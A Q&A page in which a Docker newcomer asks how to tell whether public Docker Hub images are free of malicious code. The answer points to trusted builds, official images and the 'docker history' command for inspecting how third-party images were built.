Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

How do you know that public Docker images are secure?

I'm just getting started with Docker, and I see that there are lots of images available at the docker hub repository. It seems like the normal way to set up a new docker container is to copy one of these images and go from there. But how do I know that these containers don't have malicious code in them, or that they don't compromise my security in some other way?

For instance but how do I know that the OS in the container isn't (for example) capturing keystrokes if I ssh into it, or hijacking system resources for some other purpose?

like image 349
Thomas Johnson Avatar asked Oct 21 '22 05:10

Thomas Johnson


1 Answers

The images marked as "Trusted build" are built by Docker on their server from the sources given by the user. You can easily check the Dockerfile from where the image have been built to check for malicious code.

You also have the 'official' images (those that does not start with 'somthing/') that are officially supported by Docker. If you trust Docker, inc, you can trust those image.

For the third part images, not from a trusted build and not from Docker, then you can check the history with docker history <image> (after pulling it) to see how it has been built, but common sense applies. It cannot be trusted.

Docker is working of provenance, so we should soon see CA Certificates check and proof of origin. Until then, just be careful are use only trusted build that you checked or official images.

like image 131
creack Avatar answered Oct 22 '22 23:10

creack